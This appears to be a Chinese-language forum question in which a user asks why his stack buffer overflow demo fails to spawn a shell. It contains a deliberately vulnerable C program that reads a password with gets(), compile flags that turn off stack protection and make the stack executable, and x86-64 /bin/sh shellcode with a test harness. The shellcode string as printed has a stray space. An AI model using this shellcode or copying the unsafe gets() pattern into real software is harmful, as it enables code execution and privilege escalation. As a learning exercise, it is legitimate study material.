我正在尝试运行堆栈溢出演示。这是我正在使用的代码:
int main(void)
{
attackFunction();
}
void attackFunction()
{
register int rsp asm("rsp");
register int rbp asm("rbp");
char buff[1024];
printf("\nAddress of buff is : %p",&buff[0]);
printf("\n$rsp = %#018x",rsp);
printf("\n$rbp = %#018x",rbp);
printf("\nThe frame address is %p, jumping to %p", __builtin_frame_address(0), __builtin_return_address(0));
int buffAddr = &buff[0];
int framePointer = __builtin_frame_address(0);
printf("\n Difference is : %d. Add 4 for ebp gives %d",framePointer-buffAddr, framePointer-buffAddr+4);
printf("\n Enter the password : \n");
gets(buff);
if(strcmp(buff, "hiddenpass"))
{
printf ("\n Wrong Password\n");
}
else
{
printf ("\n Correct Password\n");
pass = 1;
}
if(pass)
{
/* Now Give root or admin rights to user*/
printf ("\n Root privileges given to the user \n");
}
return 0;
}
我用
编译了它gcc -fno-stack-protector -z execstack -g attack.c -o attack
以便堆栈可执行并且堆栈保护已关闭。我正在尝试注入产生shell的对象代码。目标代码已经过测试并且工作正常:
unsigned char binshUnpadded[] = "\x90\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0 \x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
(*(void(*)()) binshUnpadded)();
我正确地注入了它,我可以在调试器中看到我正在滑动我的NOP幻灯片并直接命中存储在内存中的代码。但是,在gdb和没有gdb时都没有生成shell。我错过了什么吗?我需要在shellcode的开头或结尾添加一些东西吗?为什么它在我的测试程序中有效,但在我的缓冲区溢出测试中却没有?
我有点失落,有人能告诉我我做错了吗?
谢谢
托马斯